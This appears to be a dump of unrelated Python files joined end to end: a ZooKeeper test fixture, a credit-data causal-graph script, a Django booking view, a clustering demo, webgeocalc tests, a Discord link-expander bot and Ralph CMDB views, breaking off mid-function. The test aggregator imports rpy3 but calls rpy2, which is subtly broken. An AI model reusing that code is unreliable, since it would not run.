utdocker.start_container( zk_name, zk_tag, env={ "ZOO_MY_ID": 1, "ZOO_SERVERS": "server.1=0.0.0.0:2888:3888", }, port_bindings={2181: 21811} ) self.zk = KazooClient('127.0.0.1:21811') self.zk.start() self.zkauthed, _ = zkutil.kazoo_client_ext( {'hosts': '127.0.0.1:21811', 'auth': ('digest', 'xp', '123'), 'acl': (('xp', '123', 'cdrwa'), ('foo', 'bar', 'rw'))}) dd('start zk-test in docker') def tearDown(self): self.zk.stop() self.zkauthed.stop() utdocker.remove_container(zk_name) <filename>fairGAN_code/fairgan_generate_graph.py def discover_graph(): column_names = ['male', 'age', 'debt', 'married', 'bankcustomer', 'educationlevel', 'ethnicity', 'yearsemployed', 'priordefault', 'employed', 'creditscore', 'driverslicense', 'citizen', 'zip', 'income', 'approved'] data = pd.read_csv('data/crx.data', header=None, names=column_names) 
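    # The steps below (continued on the following lines) drop incomplete rows, label-encode the
    # categorical columns, and then run the FGES search from the py-causal/Tetrad bridge with
    # temporal background knowledge, finally collecting the discovered edges as index pairs.
    # (This function assumes `pandas as pd` and `sklearn.preprocessing` are imported at module level.)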
    data.reset_index(drop=True, inplace=True)
    data = data.dropna(how='all')
    data = data[data.age != '?']
    print(data.head())

    for feat in ['male', 'married', 'bankcustomer', 'educationlevel', 'ethnicity', 'priordefault',
                 'employed', 'driverslicense', 'citizen', 'zip', 'approved']:
        data[feat] = preprocessing.LabelEncoder().fit_transform(data[feat])

    #####################################################
    #### For this experiment, we uniquely drop the default variable (prior default)
    #####################################################
    # data = data.drop(['educationlevel'], axis=1)

    from pycausal.pycausal import pycausal as pc
    pc = pc()
    pc.start_vm()

    from pycausal import prior as p
    from pycausal import search as s

    prior = p.knowledge(addtemporal=[['male', 'age', 'ethnicity'],
                                     ['debt', 'married', 'bankcustomer', 'educationlevel',
                                      'yearsemployed', 'employed', 'creditscore', 'driverslicense',
                                      'citizen', 'zip', 'income'],
                                     ['approved']])

    tetrad = s.tetradrunner()
    tetrad.run(algoId='fges', scoreId='cg-bic-score', dfs=data, priorKnowledge=prior,
               maxDegree=-1, faithfulnessAssumed=True, verbose=False)
    tetrad.getEdges()

    edges = []
    for edge in tetrad.getEdges():
        edges.append([column_names.index(edge.split(' ')[0]),
                      column_names.index(edge.split(' ')[-1])])
    print(edges)
    # Copy the above edge list
    column_names.index('male')
from module.princess import unitproc
from module.image import proc
import cv2

report = cv2.imread("assets/b.png")      # read the image
report = proc.preprocessing(report)      # crop the central window
report = proc.report_processing(report)  # process the damage-report image
char_list = unitproc.process(report)     # locate the character portraits

for char in char_list:
    objUnit = unitproc.unit(char)
    objUnit.detect()
    result = objUnit.getResult()
    if result is False:
        print("Character not found")
    else:
        print(result)
<filename>Web dev/Django/Projects/Sports_Resource_Booking/SportsResourceBooking/reserve/views.py<gh_stars>1-10
from django.shortcuts import render
from .models import addDetails
from django.utils.datastructures import MultiValueDictKeyError

# Create your views here.
def addInfo(request):
    try:
        noOfitems = request.POST['no_of_items']
    except MultiValueDictKeyError:
        noOfitems = 0
    try:
        times = request.POST['timings']
    except MultiValueDictKeyError:
        times = "00:00"
    try:
        equipment_type = request.POST['equipment_type']
    except MultiValueDictKeyError:
        equipment_type = "none"
    obj = addDetails(idno=request.user.username, phno=request.user.last_name,
                     equipment_type=equipment_type, noOfitems=noOfitems, times=times)
    obj.save()
    return render(request, 'form.html')
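
# A hypothetical alternative sketch (not part of the original file): the same behaviour can be
# written with QueryDict.get defaults instead of the three try/except blocks above. The name
# addInfo_with_defaults is invented for illustration and assumes the same addDetails model.
def addInfo_with_defaults(request):
    # .get returns the fallback value when the form field is absent from the POST data.
    noOfitems = request.POST.get('no_of_items', 0)
    times = request.POST.get('timings', "00:00")
    equipment_type = request.POST.get('equipment_type', "none")
    obj = addDetails(idno=request.user.username, phno=request.user.last_name,
                     equipment_type=equipment_type, noOfitems=noOfitems, times=times)
    obj.save()
    return render(request, 'form.html')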
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd

# Importing the dataset
dataset = pd.read_csv('Mall_Customers.csv')
X = dataset.iloc[:, [3, 4]].values

# Using the dendrogram to find the optimal number of clusters
# import scipy.cluster.hierarchy as sch
# dendrogram = sch.dendrogram(sch.linkage(X, method='ward'))
# plt.title('Dendrogram')
# plt.xlabel('Customers')
# plt.ylabel('Euclidean distances')
# plt.show()

# Fit hierarchical clustering to the mall dataset
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters=5, affinity='euclidean', linkage='ward')
y_hc = hc.fit_predict(X)

# Visualizing the clusters
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s=100, c='red', label='Careful')
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s=100, c='blue', label='Standard')
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s=100, c='green', label='Target')
plt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1], s=100, c='cyan', label='Careless')
plt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s=100, c='magenta', label='Sensible')
plt.title('Clusters of Customers by using Hierarchical Clustering')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
"""Collection of small functions to simplify common tasks."""
from typing import Callable


def bundle_callables(*callables: Callable) -> Callable:
    """
    Bundle many callables into a single function.

    Callables will be invoked in the order given.
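
    A short illustrative example (the two callables below are arbitrary and assume the
    standard `logging` module has been imported):

        notify = bundle_callables(print, logging.info)
        notify("saving state")   # printed first, then logged, in the order given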
""" def bundle_callables_inner(*args, **kwargs): """Call all callables in order.""" for method in callables: method(*args, **kwargs) return bundle_callables_inner def bitwise_add(a: int, b: int) -> int: """Merge two binary masks together.""" return a | b def bitwise_remove(a: int, b: int) -> int: """Remove a binary mask from another mask.""" if bitwise_contains(a, b): return a ^ b return a def bitwise_contains(a: int, b: int) -> bool: """Return True if any bit of mask `b` is contained in `a`.""" return bool(a & b) <gh_stars>0 # -*- coding: utf-8 -*- '''Test WGC angular frame transformation calculation.''' import pytest from webgeocalc import FrameTransformation from webgeocalc.errors import (CalculationIncompatibleAttr, CalculationInvalidAttr) @pytest.fixture def kernels(): '''Cassini kernel set.''' return 5 @pytest.fixture def time(): '''Input time.''' return '2012-10-19T08:24:00.000' @pytest.fixture def frame_1(): '''Input frame 1.''' return 'IAU_SATURN' @pytest.fixture def frame_2(): '''Input frame 2.''' return 'IAU_ENCELADUS' @pytest.fixture def corr(): '''Input aberration correction.''' return 'NONE' @pytest.fixture def params(kernels, time, frame_1, frame_2, corr): '''Input parameters from WGC API example.''' return { 'kernels': kernels, 'times': time, 'frame_1': frame_1, 'frame_2': frame_2, 'aberration_correction': corr, } @pytest.fixture def payload(kernels, time, frame_1, frame_2, corr): '''Payload from WGC API example.''' return { "kernels": [{ "type": "KERNEL_SET", "id": kernels, }], "timeSystem": "UTC", "timeFormat": "CALENDAR", "times": [ time, ], "calculationType": "FRAME_TRANSFORMATION", "frame1": frame_1, "frame2": frame_2, "aberrationCorrection": corr, "timeLocation": "FRAME1", "orientationRepresentation": "EULER_ANGLES", "axis1": "X", "axis2": "Y", "axis3": "Z", "angularUnits": "deg", "angularVelocityRepresentation": "VECTOR_IN_FRAME1", "angularVelocityUnits": "deg/s" } def test_frame_transformation_payload(params, payload): '''Test angular frame transformation payload.''' assert FrameTransformation(**params).payload == payload def test_frame_transformation_attr_err(params): '''Test errors when frame transformation is invalid.''' del params['aberration_correction'] with pytest.raises(CalculationInvalidAttr): # aberration_correctin can not be '+S' FrameTransformation(aberration_correction='CN+S', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(time_location='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(orientation_representation='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(axis_1='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(angular_units='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(angular_velocity_representation='WRONG', **params) with pytest.raises(CalculationInvalidAttr): FrameTransformation(angular_velocity_units='WRONG', **params) with pytest.raises(CalculationIncompatibleAttr): FrameTransformation(angular_velocity_representation='EULER_ANGLE_DERIVATIVES', angular_velocity_units='Unitary', **params) import unittest import rpy3.robjects.tests import rpy3.rinterface.tests import rpy3.rlike.tests import rpy3.tests_rpy_classic def suite(): suite_robjects = rpy2.robjects.tests.suite() suite_rinterface = rpy2.rinterface.tests.suite() suite_rlike = rpy2.rlike.tests.suite() suite_rpy_classic = rpy2.tests_rpy_classic.suite() alltests = unittest.TestSuite([suite_robjects, suite_rinterface, suite_rlike, 
suite_rpy_classic ]) return alltests if __name__ == "__main__": unittest.main(defaultTest = "suite") from typing import Optional import os import discord from discord import Embed from discord.embeds import EmptyEmbed from discord.ext import commands import re regex_discord_message_url = ( '(?!<)https://(ptb.|canary.)?discord(app)?.com/channels/' '(?P<guild>[0-9]{18})/(?P<channel>[0-9]{18})/(?P<message>[0-9]{18})(?!>)' ) regex_extra_url = ( r'\?base_aid=(?P<base_author_id>[0-9]{18})' '&aid=(?P<author_id>[0-9]{18})' '&extra=(?P<extra_messages>(|[0-9,]+))' ) DELETE_REACTION_EMOJI = os.environ.get("DELETE_REACTION_EMOJI", "\U0001f5d1") class ExpandDiscordMessageUrl(commands.Cog): def __init__(self, bot): self.bot = bot @commands.Cog.listener() async def on_message(self, message): if message.author.bot: return await dispand(message) @commands.Cog.listener() async def on_raw_reaction_add(self, payload: discord.RawReactionActionEvent): await delete_dispand(self.bot, payload=payload) async def delete_dispand(bot: discord.Client, *, payload: Optional[discord.RawReactionActionEvent] = None, reaction: Optional[discord.Reaction] = None, user: Optional[discord.User] = None): if payload is not None: # when on_raw_reaction_add event if str(payload.emoji) != DELETE_REACTION_EMOJI: return if payload.user_id == bot.user.id: return channel = bot.get_channel(payload.channel_id) message = await channel.fetch_message(payload.message_id) await _delete_dispand(bot, message, payload.user_id) elif reaction is not None: # when on_reaction_add event if str(reaction.emoji) != DELETE_REACTION_EMOJI: return if user.id == bot.user.id: return await _delete_dispand(bot, reaction.message, user.id) else: raise ValueError("payload or reaction must be setted") async def _delete_dispand(bot: discord.Client, message: discord.Message, operator_id: int): if message.author.id != bot.user.id: return elif not message.embeds: return embed = message.embeds[0] if getattr(embed.author, "url", None) is None: return data = from_jump_url(embed.author.url) if not (data["base_author_id"] == operator_id or data["author_id"] == operator_id): return await message.delete() for message_id in data["extra_messages"]: extra_message = await message.channel.fetch_message(message_id) if extra_message is not None: await extra_message.delete() async def dispand(message): messages = await extract_message(message) for m in messages: sent_messages = [] if m.content or m.attachments: sent_message = await message.channel.send(embed=compose_embed(m)) sent_messages.append(sent_message) # Send the second and subsequent attachments with embed (named 'embed') respectively: for attachment in m.attachments[1:]: embed = Embed() embed.set_image( url=attachment.proxy_url ) sent_attachment_message = await message.channel.send(embed=embed) sent_messages.append(sent_attachment_message) for embed in m.embeds: sent_embed_message = await message.channel.send(embed=embed) sent_messages.append(sent_embed_message) # 一番先頭のメッセージにゴミ箱のリアクションをつける main_message = sent_messages.pop(0) await main_message.add_reaction(DELETE_REACTION_EMOJI) main_embed = main_message.embeds[0] main_embed.set_author( name=getattr(main_embed.author, "name", EmptyEmbed), icon_url=getattr(main_embed.author, "icon_url", EmptyEmbed), url=make_jump_url(message, m, sent_messages) ) await main_message.edit(embed=main_embed) async def extract_message(message): messages = [] for ids in re.finditer(regex_discord_message_url, message.content): if message.guild.id != int(ids['guild']): continue fetched_message = await 
fetch_message_from_id( guild=message.guild, channel_id=int(ids['channel']), message_id=int(ids['message']), ) messages.append(fetched_message) return messages async def fetch_message_from_id(guild, channel_id, message_id): channel = guild.get_channel(channel_id) message = await channel.fetch_message(message_id) return message def make_jump_url(base_message, dispand_message, extra_messages): """ make jump url which include more information :param base_message: メッセージリンクが貼られていたメッセージ :param dispand_message: 展開中のメッセージ :param extra_messages: 展開する際にでた二つ目以降のメッセージ(e.g. 画像やembed) :return: 混入が完了したメッセージリンク """ # base_aid: メッセージリンクで飛べる最初のメッセージの送信者のid # aid: メッセージリンクを送信したユーザーのid return "{0.jump_url}?base_aid={1.id}&aid={2.id}&extra={3}".format( dispand_message, dispand_message.author, base_message.author, ",".join([str(i.id) for i in extra_messages]) ) def from_jump_url(url): """ メッセージリンクから情報を取得します。 :param url: メッセージリンク :return: dict """ base_url_match = re.match(regex_discord_message_url + regex_extra_url, url) data = base_url_match.groupdict() return { "base_author_id": int(data["base_author_id"]), "author_id": int(data["author_id"]), "extra_messages": [int(_id) for _id in data["extra_messages"].split(",")] if data["extra_messages"] else [] } def compose_embed(message): embed = Embed( description=message.content, timestamp=message.created_at, color=discord.Colour.red() ) embed.set_author( name=message.author.display_name, icon_url=message.author.avatar_url, url=message.jump_url ) embed.set_footer( text=message.channel.name, icon_url=message.guild.icon_url, ) if message.attachments and message.attachments[0].proxy_url: embed.set_image( url=message.attachments[0].proxy_url ) return embed def setup(bot): bot.add_cog(ExpandDiscordMessageUrl(bot)) <reponame>jjagodzinski/ralph<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import datetime import re from urlparse import urljoin from bob.data_table import DataTableMixin from bob.menu import MenuItem, MenuHeader from django.db.models import Q from django.contrib.auth.models import User from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage from django.shortcuts import get_object_or_404 from django.contrib import messages from django.http import HttpResponseRedirect from django.http import HttpResponseForbidden from django.http import HttpResponse from django.utils.translation import ugettext_lazy as _ from django.utils.safestring import mark_safe from django.utils import simplejson from django.utils.html import escape from django.conf import settings from lck.cache.memoization import memoize from lck.django.common import nested_commit_on_success from lck.django.filters import slugify from ralph.account.models import Perm, ralph_permission from ralph.cmdb.forms import ( CISearchForm, CIEditForm, CIViewForm, CIRelationEditForm, SearchImpactForm, ) from ralph.cmdb.models_ci import CILayer, CI_TYPES, CI, CIRelation, CIType import ralph.cmdb.models as db from ralph.cmdb.graphs import ImpactCalculator from ralph.ui.views.common import Base from ralph.util.presentation import ( get_device_icon, get_venture_icon, get_network_icon, ) from ralph.cmdb.forms import ( ReportFilters, ReportFiltersDateRange, ) from ralph.cmdb.util import report_filters, add_filter, table_colums JIRA_URL = urljoin(settings.ISSUETRACKERS['default']['URL'], 'browse') ROWS_PER_PAGE = 20 SAVE_PRIORITY = 200 def 
get_icon_for(ci): if not ci or not ci.content_type: return '' ctname = ci.content_type.name if ctname == 'venture': return get_venture_icon(ci.content_object) elif ctname == 'device': return get_device_icon(ci.content_object) elif ctname == 'network': return get_network_icon(ci.content_object) else: return 'wall' class BaseCMDBView(Base): template_name = 'nope.html' Form = CIRelationEditForm def generate_breadcrumb(self): parent = self.request.GET.get('parent', '') if not parent: return [] list = [] counter = 0 while parent and counter < 100: ci = db.CI.objects.filter(id=parent).all()[0] list.insert(0, ci) try: parent = db.CI.objects.filter(parent__child=parent).all()[0].id except: parent = None if parent == ci.id: parent = None counter += 1 return list @memoize(skip_first=True, update_interval=60) def get_permissions_dict(self, user_id): has_perm = User.objects.get(pk=user_id).get_profile().has_perm ci_perms = [ 'create_configuration_item', 'edit_configuration_item_info_generic', 'edit_configuration_item_relations', 'read_configuration_item_info_generic', 'read_configuration_item_info_puppet', 'read_configuration_item_info_git', 'read_configuration_item_info_jira', ] ret = {} for perm in ci_perms: ret.update({perm + '_perm': has_perm(getattr(Perm, perm))}) return ret def _get_sidebar_layers_items(self): return [ ( '/cmdb/search?layer=%d' % layer.id, layer.name, layer.icon.raw if layer.icon else 'fugue-layers-stack-arrange', ) for layer in CILayer.objects.order_by('name') ] def get_sidebar_items(self): ci = ( ('/cmdb/add', 'Add CI', 'fugue-block--plus'), ('/cmdb/changes/dashboard', 'Dashboard', 'fugue-dashboard'), ('/cmdb/graphs', 'Impact report', 'fugue-dashboard'), ('/cmdb/changes/timeline', 'Timeline View', 'fugue-dashboard'), ('/admin/cmdb', 'Admin', 'fugue-toolbox'), ('/cmdb/cleanup', 'Clean up', 'fugue-broom'), ) layers = ( ('/cmdb/search', 'All Cis (all layers)', 'fugue-magnifier'), ) layers += tuple(self._get_sidebar_layers_items()) reports = ( ('/cmdb/changes/reports?kind=top_changes', 'Top CI changes', 'fugue-reports'), ('/cmdb/changes/reports?kind=top_problems', 'Top CI problems', 'fugue-reports'), ('/cmdb/changes/reports?kind=top_incidents', 'Top CI incidents', 'fugue-reports'), ('/cmdb/changes/reports?kind=usage', 'Cis w/o changes', 'fugue-reports'), ) events = ( ('/cmdb/changes/changes', 'All Events', 'fugue-arrow'), ('/cmdb/changes/changes?type=3', 'Asset attr. 
changes', 'fugue-wooden-box--arrow'), ('/cmdb/changes/changes?type=4', 'Monitoring events', 'fugue-thermometer'), ('/cmdb/changes/changes?type=1', 'Repo changes', 'fugue-git'), ('/cmdb/changes/changes?type=2', 'Agent events', 'fugue-flask'), ('/cmdb/changes/incidents', 'Incidents', 'fugue-question'), ('/cmdb/changes/problems', 'Problems', 'fugue-bomb'), ('/cmdb/changes/jira_changes', 'Jira Changes', 'fugue-arrow-retweet'), ) sidebar_items = ( [MenuHeader('Configuration Items')] + [MenuItem( label=t[1], fugue_icon=t[2], href=t[0] ) for t in ci] + [MenuHeader('CI by Layers')] + [MenuItem( label=t[1], fugue_icon=t[2], href=t[0] ) for t in layers] + [MenuHeader('Reports')] + [MenuItem( label=t[1], fugue_icon=t[2], href=t[0] ) for t in reports] + [MenuHeader('Events and Changes')] + [MenuItem( label=t[1], fugue_icon=t[2], href=t[0] ) for t in events] + [MenuHeader('Other')] + [MenuItem( label='Archive', fugue_icon='fugue-vise-drawer', href='/cmdb/archive/assets/', )] ) return sidebar_items def get_context_data(self, *args, **kwargs): ret = super(BaseCMDBView, self).get_context_data(**kwargs) ret.update(self.get_permissions_dict(self.request.user.id)) ret.update({ 'sidebar_items': self.get_sidebar_items(), 'breadcrumbs': self.generate_breadcrumb(), 'url_query': self.request.GET, 'span_number': '6', 'ZABBIX_URL': settings.ZABBIX_URL, 'SO_URL': settings.SO_URL, 'tabs_left': False, 'fisheye_url': settings.FISHEYE_URL, 'fisheye_project': settings.FISHEYE_PROJECT_NAME, 'section': 'cmdb', }) return ret def _get_pages(paginator, page): pages = paginator.page_range[ max(0, page - 4):min(paginator.num_pages, page + 3) ] if 1 not in pages: pages.insert(0, 1) pages.insert(1, '...') if paginator.num_pages not in pages: pages.append('...') pages.append(paginator.num_pages) return pages def get_error_title(form): return ', '.join( form.errors.get('__all__', []), ) or 'Correct the errors.' 
if form.errors else '' class EditRelation(BaseCMDBView): template_name = 'cmdb/edit_relation.html' Form = CIRelationEditForm form_options = dict( label_suffix='', prefix='base', ) def get_context_data(self, **kwargs): ret = super(EditRelation, self).get_context_data(**kwargs) ret.update({ 'form': self.form, }) return ret def get(self, *args, **kwargs): if not self.get_permissions_dict(self.request.user.id).get( 'edit_configuration_item_relations_perm', False): return HttpResponseForbidden() rel_id = kwargs.get('relation_id') rel = get_object_or_404(db.CIRelation, id=rel_id) self.form_options['instance'] = rel self.form = self.Form(**self.form_options) self.rel_parent = rel.parent self.rel_child = rel.child self.rel_type = rel.type self.rel = rel return super(EditRelation, self).get(*args, **kwargs) @nested_commit_on_success def post(self, *args, **kwargs): self.form = None self.rel = None rel_id = kwargs.get('relation_id') rel = get_object_or_404(db.CIRelation, id=rel_id) self.form_options['instance'] = rel ci_id = kwargs.get('ci_id') if ci_id: # remove relation ci_relation = db.CIRelation.objects.filter(id=rel_id).all() ci_relation.delete() return HttpResponse('ok') if self.Form: self.form = self.Form(self.request.POST, **self.form_options) if self.form.is_valid(): ci_id = self.kwargs.get('ci_id') model = self.form.save(commit=False) model.save(user=self.request.user) return HttpResponseRedirect('/cmdb/edit/%s' % ci_id) else: error_title = get_error_title(self.form) messages.error(self.request, _(error_title)) return super(EditRelation, self).get(*args, **kwargs) class AddRelation(BaseCMDBView): template_name = 'cmdb/add_relation.html' Form = CIRelationEditForm form_options = dict( label_suffix='', prefix='base', ) def get_context_data(self, **kwargs): ret = super(AddRelation, self).get_context_data(**kwargs) ret.update({ 'form': self.form, 'relations_parent': self.relations_parent, 'relations_child': self.relations_child, }) return ret def form_initial(self): data = { 'parent': self.rel_parent, 'child': self.rel_child, } return data def get(self, *args, **kwargs): if not self.get_permissions_dict(self.request.user.id).get( 'edit_configuration_item_relations_perm', False): return HttpResponseForbidden() self.rel_parent = self.request.GET.get('rel_parent') self.rel_child = self.request.GET.get('rel_child') ci_id = kwargs.get('ci_id') self.ci = get_object_or_404(db.CI, id=ci_id) self.relations_parent = [ x.child for x in db.CIRelation.objects.filter(parent=ci_id) ] self.relations_child = [ x.parent for x in db.CIRelation.objects.filter(child=ci_id) ] self.form_options['initial'] = self.form_initial() self.form = self.Form(**self.form_options) return super(AddRelation, self).get(*args, **kwargs) @nested_commit_on_success def post(self, *args, **kwargs): self.form = None self.rel = None ci_id = kwargs.get('ci_id') self.ci = get_object_or_404(db.CI, id=ci_id) self.relations_parent = db.CIRelation.objects.filter( parent=ci_id, ) self.relations_child = db.CIRelation.objects.filter( child=ci_id, ) if self.Form: self.form = self.Form(self.request.POST, **self.form_options) if self.form.is_valid(): ci_id = self.kwargs.get('ci_id') model = self.form.save(commit=False) model.save(user=self.request.user) return HttpResponseRedirect('/cmdb/ci/edit/%s' % ci_id) else: error_title = get_error_title(self.form) messages.error(self.request, _(error_title)) return super(AddRelation, self).get(*args, **kwargs) class Add(BaseCMDBView): template_name = 'cmdb/add_ci.html' Form = CIEditForm form_options = dict( 
label_suffix='', prefix='base', ) def get_context_data(self, **kwargs): ret = super(Add, self).get_context_data(**kwargs) ret.update({ 'form': self.form, 'label': 'Add CI', 'subsection': 'Add CI', 'sidebar_selected': 'add ci', }) return ret def get(self, *args, **kwargs): self.form = self.Form(**self.form_options) return super(Add, self).get(*args, **kwargs) @nested_commit_on_success def post(self, *args, **kwargs): self.form = None self.ci = None if self.Form: self.form = self.Form(self.request.POST, **self.form_options) if self.form.is_valid(): model = self.form.save() if not model.content_object: model.uid = "%s-%s" % ('mm', model.id) model.save(user=self.request.user) messages.success(self.request, _("Changes saved.")) return HttpResponseRedirect( '/cmdb/ci/edit/' + unicode(model.id), ) else: messages.error(self.request, _("Correct the errors.")) return super(Add, self).get(*args, **kwargs) class LastChanges(BaseCMDBView): template_name = 'cmdb/search_changes.html' def get_context_data(self, **kwargs): ret = super(LastChanges, self).get_context_data(**kwargs) ret.update({ 'last_changes': self.last_changes, 'jira_url': JIRA_URL, }) return ret def get_last_changes(self, ci): from ralph.cmdb.integration.jira import Jira params = dict(jql='DB\\ CI="%s"' % self.ci_uid) xxx = Jira().find_issues(params) items_list = [] for i in xxx.get('issues'): f = i.get('fields') items_list.append(dict( key=i.get('key'), description=f.get('description'), summary=f.get('summary'), assignee=f.get('assignee').get('displayName'))), return items_list def get(self, *args, **kwargs): self.ci_uid = kwargs.get('ci_id', None) self.last_changes = self.get_last_changes(self.ci_uid) return super(LastChanges, self).get(*args, **kwargs) class BaseCIDetails(BaseCMDBView): template_name = 'cmdb/ci_details.html' def check_perm(self): if not self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_generic_perm', False, ): return HttpResponseForbidden() def get_tabs(self): tabs = [ ('Basic Info', 'main'), ('Relations', 'relations'), ] if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_git_perm', False ): tabs.append(('Repo changes', 'git')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_puppet_perm', False ): tabs.append(('Agent events', 'puppet')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Asset attr. changes', 'ralph')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('CI attr. 
changes', 'ci_changes')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Monitoring events', 'zabbix')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Problems', 'problems')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Incidents', 'incidents')) if self.get_permissions_dict(self.request.user.id).get( 'read_configuration_item_info_jira_perm', False ): tabs.append(('Jira Changes', 'jira_changes')) return tabs def generate_breadcrumb(self): if getattr(self, 'ci'): parent_id = self.ci.id else: return [] breadcrumbs = [] counter = 0 while parent_id and counter < 100: try: ci = db.CI.objects.filter(id=parent_id).all()[0] except IndexError: break breadcrumbs.insert(0, ci) try: parent_id = db.CI.objects.filter( parent__child=parent_id ).all()[0].id except IndexError: parent_id = None if parent_id == ci.id: parent_id = None counter += 1 return breadcrumbs def get_messages(self): days = datetime.timedelta(days=7) last_week_puppet_errors = db.CIChangePuppet.objects.filter( ci=self.ci, time__range=( datetime.datetime.now(), datetime.datetime.now() - days) ).count() incidents = db.CIIncident.objects.filter( ci=self.ci, ).count() problems = db.CIProblem.objects.filter( ci=self.ci, ).count() messages = [] if last_week_puppet_errors: messages.append(dict( message="Puppet reported %d errors since last week." % ( last_week_puppet_errors), title='Warning', type='warning', )) if incidents: messages.append(dict( message="This CI has %d incidents." % (incidents), title='Be carefull.', type='error', )) if problems: messages.append(dict( message="This CI has %d problems." 
% (problems), title='Be carefull.', type='error', )) return messages def get_ci_id(self): # 2 types of id can land here ci_id = self.kwargs.get('ci_id') if ci_id.find('-') >= 0: ci = db.CI.objects.get(uid=ci_id) return ci.id else: return self.kwargs.get('ci_id', None) def initialize_vars(self): self.tabs = self.get_tabs() path = self.request.path if self.request.path.endswith('/'): path = self.request.path else: path = '%s/' % self.request.path if not re.search(r'[0-9]+/$', path): path = '%s../' % path self.base_ci_link = path def get_context_data(self, **kwargs): ret = super(BaseCIDetails, self).get_context_data(**kwargs) ret.update({ 'tabs': self.tabs, 'active_tab': self.active_tab, 'base_ci_link': self.base_ci_link, 'label': 'Edit CI: {} (uid: {})'.format(self.ci.name, self.ci.uid), 'subsection': 'Edit - %s' % self.ci.name, 'ci': self.ci, 'ci_id': self.ci.id, 'uid': self.ci.uid, 'cmdb_messages': self.get_messages(), }) return ret def _update_labels(items, ci): items.update({ 'label': 'View CI: {} (uid: {})'.format(ci.name, ci.uid), 'subsection': 'Info - %s' % ci.name, }) return items class MainCIEdit(BaseCIDetails): template_name = 'cmdb/ci_edit.html' active_tab = 'main' Form = CIEditForm form_options = dict(label_suffix='', prefix='base') def initialize_vars(self): super(MainCIEdit, self).initialize_vars() self.show_in_ralph = False self.ralph_ci_link = '' def get_context_data(self, **kwargs): ret = super(MainCIEdit, self).get_context_data(**kwargs) ret.update({ 'show_in_ralph': self.show_in_ralph, 'ralph_ci_link': self.ralph_ci_link, 'service_name': getattr(self, 'service_name', None), 'editable': True, 'form': self.form, }) return ret def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. 
return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) if ( self.ci.content_object and self.ci.content_type.name == 'device' ): self.show_in_ralph = True self.ralph_ci_link = "/ui/search/info/%d" % ( self.ci.content_object.id ) self.service_name = self.get_first_parent_venture_name(ci_id) self.form_options['instance'] = self.ci # self.form_options['initial'] = self.form_initial(self.ci) self.form = self.Form(**self.form_options) return super(MainCIEdit, self).get(*args, **kwargs) @nested_commit_on_success def post(self, *args, **kwargs): self.initialize_vars() ci_id = self.kwargs.get('ci_id') if ci_id: self.ci = get_object_or_404(db.CI, id=ci_id) self.form_options['instance'] = self.ci self.form = self.Form( self.request.POST, **self.form_options ) if self.form.is_valid(): model = self.form.save(commit=False) model.id = self.ci.id model.save(user=self.request.user) messages.success(self.request, "Changes saved.") return HttpResponseRedirect(self.request.path) else: messages.error(self.request, "Correct the errors.") return super(MainCIEdit, self).get(*args, **kwargs) def get_first_parent_venture_name(self, ci_id): cis = db.CI.objects.filter( relations__parent__child=ci_id, relations__parent__parent__type=db.CI_TYPES.VENTUREROLE.id, ).all() if cis: return cis[0].name class MainCIView(MainCIEdit): Form = CIViewForm def get_context_data(self, **kwargs): ret = super(MainCIView, self).get_context_data(**kwargs) ret = _update_labels(ret, self.ci) ret.update({ 'editable': False, }) return ret def post(self, *args, **kwargs): return HttpResponseForbidden() class CIRelationsEdit(BaseCIDetails): template_name = 'cmdb/ci_relations.html' active_tab = 'relations' def get_context_data(self, **kwargs): ret = super(CIRelationsEdit, self).get_context_data(**kwargs) ret.update({ 'relations_contains': self.relations_contains, 'relations_requires': self.relations_requires, 'relations_isrequired': self.relations_isrequired, 'relations_parts': self.relations_parts, 'relations_hasrole': self.relations_hasrole, 'relations_isrole': self.relations_isrole, 'editable': True, }) return ret def initialize_vars(self): super(CIRelationsEdit, self).initialize_vars() self.relations_contains = [] self.relations_parts = [] self.relations_requires = [] self.relations_isrequired = [] self.relations_hasrole = [] self.relations_isrole = [] def get(self, *args, **kwargs): perm = self.check_perm() if perm: return perm self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: # CI doesn's exists. 
